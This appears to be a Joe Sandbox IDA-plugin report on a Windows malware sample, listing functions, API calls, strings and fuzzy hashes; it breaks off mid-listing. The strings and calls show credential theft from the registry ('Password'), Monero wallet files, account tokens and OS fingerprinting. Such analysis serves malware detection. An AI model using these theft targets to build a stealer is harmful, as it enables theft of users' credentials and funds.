Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: 46bface2e08d083f04a33791968a44ed4e559f2d0b22eac8860e302a4ddcc203
Instruction ID: bfc8b3a449ce91d6600b728239b9287fe1088ac752f97fbb08944e8372921c68
Opcode Fuzzy Hash: 46bface2e08d083f04a33791968a44ed4e559f2d0b22eac8860e302a4ddcc203
Instruction Fuzzy Hash: 5C5140B1A00218ABDF20DF61CC45BEE7779AB44305F50859CFA09BB1C1DBB46A89CF95

Function 00957310 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0095737A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009573F1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0095744D
GetProcessHeap.KERNEL32(00000000,?), ref: 00957492
HeapFree.KERNEL32(00000000), ref: 00957499
task.LIBCPMTD ref: 00957595

Strings

Password, xrefs: 00957441

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Heap$EnumFreeOpenProcessValuetask
String ID: Password
API String ID: 775622407-3434357891
Opcode ID: 126b2ea230b8fe17ff45858cefb299c2b2e6c8134ca18295cf942314ccdc7e8c
Instruction ID: a76faf2b815dca050672fb4d571b21a435dd890cdb05d76574c21c6256aff08e
Opcode Fuzzy Hash: 126b2ea230b8fe17ff45858cefb299c2b2e6c8134ca18295cf942314ccdc7e8c
Instruction Fuzzy Hash: 67613CB59042589BDB24DF51DC45BDAB7B8BF84301F0081E9EA49A7141EFB06BC9CF90

Function 0095B8E0 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

Part of subcall function 0096A380: lstrlen.KERNEL32(?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 0096A395
Part of subcall function 0096A380: lstrcpy.KERNEL32(00000000), ref: 0096A3D4
Part of subcall function 0096A380: lstrcat.KERNEL32(00000000,00000000), ref: 0096A3E2

Part of subcall function 0096A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0096A342
Part of subcall function 0096A2F0: lstrcat.KERNEL32(00000000), ref: 0096A352

Part of subcall function 0096A270: lstrcpy.KERNEL32(?,00970DFF), ref: 0096A2D5

Part of subcall function 00959E60: LocalAlloc.KERNEL32(00000040,?), ref: 00959EFE

lstrlen.KERNEL32(00000000), ref: 0095BADD

Part of subcall function 009688D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009688F2

StrStrA.SHLWAPI(00000000,AccountId), ref: 0095BB0B
lstrlen.KERNEL32(00000000), ref: 0095BBE3
lstrlen.KERNEL32(00000000), ref: 0095BBF7

Strings

AccountId, xrefs: 0095BB02
SELECT service, encrypted_token FROM token_service, xrefs: 0095BA4B
AccountTokens, xrefs: 0095B9A9
AccountTokens, xrefs: 0095B91A

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcpylstrlen$AllocLocallstrcat
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3171688271-1079375795
Opcode ID: c08149cab2ee6cc4485d925f0902733bd56639e23c404f4170c035854a9730df
Instruction ID: 7338ea0c8210c6987607cdd5c5fdf1662cba7483fba12f50b64abe2988b9a659
Opcode Fuzzy Hash: c08149cab2ee6cc4485d925f0902733bd56639e23c404f4170c035854a9730df
Instruction Fuzzy Hash: 8DA10872910108ABCB14FBA4DC96FEE7778AF94304F404569F507B61A1EF746A48CF62

Function 00955000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0095501A
RtlAllocateHeap.NTDLL(00000000), ref: 00955021
InternetOpenA.WININET(00970DC7,00000000,00000000,00000000,00000000), ref: 0095503A
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00955061
InternetReadFile.WININET(?,?,00000400,00000000), ref: 00955091
InternetCloseHandle.WININET(?), ref: 00955109
InternetCloseHandle.WININET(?), ref: 00955116

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 3e50b218a925c0541edf0299b26b7f98cd6f31bd032d5feea5ae23195d90ab5d
Instruction ID: a2ed1583123fa9fde80e410237e390fa19d97fecf204d040804da3421fa1e215
Opcode Fuzzy Hash: 3e50b218a925c0541edf0299b26b7f98cd6f31bd032d5feea5ae23195d90ab5d
Instruction Fuzzy Hash: 5D310AB5A00218EBDB20DF54CC85BDDB7B5BB48304F5081D9FB09A7281DB706AC58F98

Function 00967E7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00967EC6
wsprintfA.USER32 ref: 00967EF9
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00967F1B
RegCloseKey.ADVAPI32(00000000), ref: 00967F2C
RegCloseKey.ADVAPI32(00000000), ref: 00967F39

Part of subcall function 0096A170: lstrcpy.KERNEL32(?,00000000), ref: 0096A1B6

RegQueryValueExA.KERNEL32(00000000,0120EB08,00000000,000F003F,?,00000400), ref: 00967F8C
lstrlen.KERNEL32(?), ref: 00967FA1
RegQueryValueExA.KERNEL32(00000000,0120EB20,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00970B24), ref: 00968039
RegCloseKey.KERNEL32(00000000), ref: 009680A8
RegCloseKey.ADVAPI32(00000000), ref: 009680BA

Strings

%s\%s, xrefs: 00967EED

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 43ab6cdeb037f2f220824f9814090bd2102d0e4d217f27a4432a465a693746a5
Instruction ID: 8526b953557981c942ce2d941d6c20dfe7c67f899d6bad2857740fabe94d7e9d
Opcode Fuzzy Hash: 43ab6cdeb037f2f220824f9814090bd2102d0e4d217f27a4432a465a693746a5
Instruction Fuzzy Hash: A221E671A1421CABDB24DB54DC85FE9B7B9FB48704F00C598E609A6280DF71AAC5CFA4

Function 00954800 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000800), ref: 0095483A
??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00954852
??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00954868
lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00954889
InternetCrackUrlA.WININET(00000000,00000000), ref: 00954899

Strings

<, xrefs: 00954819

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: c95d1cabb6d6cbd6fd9642481b9310fa20f4475bfc79070204656fdd79ff2ff7
Instruction ID: 0984ab8c8374f6122d1e970ede42e5683339541989e1c86f5efff28b5162ca1e
Opcode Fuzzy Hash: c95d1cabb6d6cbd6fd9642481b9310fa20f4475bfc79070204656fdd79ff2ff7
Instruction Fuzzy Hash: B4212CB1D00208ABDF14DFA5EC45BDE7B75BB45320F108229E915B72D0DB706A09CF91

Function 00967130 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00967144
RtlAllocateHeap.NTDLL(00000000), ref: 0096714B
RegOpenKeyExA.KERNEL32(80000002,011FBC40,00000000,00020119,00000000), ref: 0096717D
RegQueryValueExA.KERNEL32(00000000,0120EAD8,00000000,00000000,?,000000FF), ref: 0096719E
RegCloseKey.ADVAPI32(00000000), ref: 009671A8

Strings

Windows 11, xrefs: 0096715D

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 40b11b52f03b89b5d96644ae613a243e0430305d8b632fd0aeabfabba1131a30
Instruction ID: a69182d068ba82ba67b93ad2fb6b8551923cf764e49dc0797e3e193b590d763e
Opcode Fuzzy Hash: 40b11b52f03b89b5d96644ae613a243e0430305d8b632fd0aeabfabba1131a30
Instruction Fuzzy Hash: 7101FF75A44208BFEB10DBE4DD59F6EBB7CEB48704F104059FA0DDB290DA709A848B50

Function 009671C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 009671D4
RtlAllocateHeap.NTDLL(00000000), ref: 009671DB
RegOpenKeyExA.KERNEL32(80000002,011FBC40,00000000,00020119,00967159), ref: 009671FB
RegQueryValueExA.KERNEL32(00967159,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0096721A
RegCloseKey.ADVAPI32(00967159), ref: 00967224

Strings

CurrentBuildNumber, xrefs: 00967211

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: a68913d1012d72700c1a5a5d5876068fe4fb1ba0dac905e83fb8c44619336b59
Instruction ID: 758b2da9af33ca09f3c470ac517e1631c78a455106721263fa11fbfe6f3191c5
Opcode Fuzzy Hash: a68913d1012d72700c1a5a5d5876068fe4fb1ba0dac905e83fb8c44619336b59
Instruction Fuzzy Hash: 2C01F4B5A40308BFDB10DBE4DC5AFAEBB78EB48704F104558FA19A7281DA7066448B51

Function 00966490 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00969270: GetProcAddress.KERNEL32(75900000,01200558), ref: 009692B1
Part of subcall function 00969270: GetProcAddress.KERNEL32(75900000,01200708), ref: 009692CA
Part of subcall function 00969270: GetProcAddress.KERNEL32(75900000,012006C0), ref: 009692E2
Part of subcall function 00969270: GetProcAddress.KERNEL32(75900000,01200600), ref: 009692FA
Part of subcall function 00969270: GetProcAddress.KERNEL32(75900000,012005B8), ref: 00969313
Part of subcall function 00969270: GetProcAddress.KERNEL32(75900000,012088C0), ref: 0096932B
Part of subcall function 00969270: GetProcAddress.KERNEL32(75900000,011F66E0), ref: 00969343
Part of subcall function 00969270: GetProcAddress.KERNEL32(75900000,011F6840), ref: 0096935C
Part of subcall function 00969270: GetProcAddress.KERNEL32(75900000,012005D0), ref: 00969374
Part of subcall function 00969270: GetProcAddress.KERNEL32(75900000,01200810), ref: 0096938C
Part of subcall function 00969270: GetProcAddress.KERNEL32(75900000,012005E8), ref: 009693A5
Part of subcall function 00969270: GetProcAddress.KERNEL32(75900000,01200630), ref: 009693BD
Part of subcall function 00969270: GetProcAddress.KERNEL32(75900000,011F6A00), ref: 009693D5
